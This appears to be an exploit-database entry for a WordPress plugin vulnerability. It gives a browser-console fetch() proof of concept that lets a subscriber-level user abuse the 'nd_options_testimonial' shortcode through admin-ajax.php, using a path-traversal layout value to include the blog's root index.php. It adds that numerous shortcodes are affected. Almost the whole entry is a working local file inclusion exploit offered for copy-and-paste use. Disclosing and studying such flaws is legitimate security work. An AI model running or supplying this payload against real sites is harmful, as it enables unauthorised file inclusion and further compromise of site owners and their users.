## https://sploitus.com/exploit?id=WPEX-ID:0805ED7E-395D-48DE-B484-6C3EC1CD4B8E
Run the below command in the developer console of the web browser while being on the blog as a subscriber user, this will include the index.php file of the root of the blog
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "action=parse-media-shortcode&shortcode=[nd_options_testimonial nd_options_layout='../../../../../../index']",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Numerous shortcodes were affected by this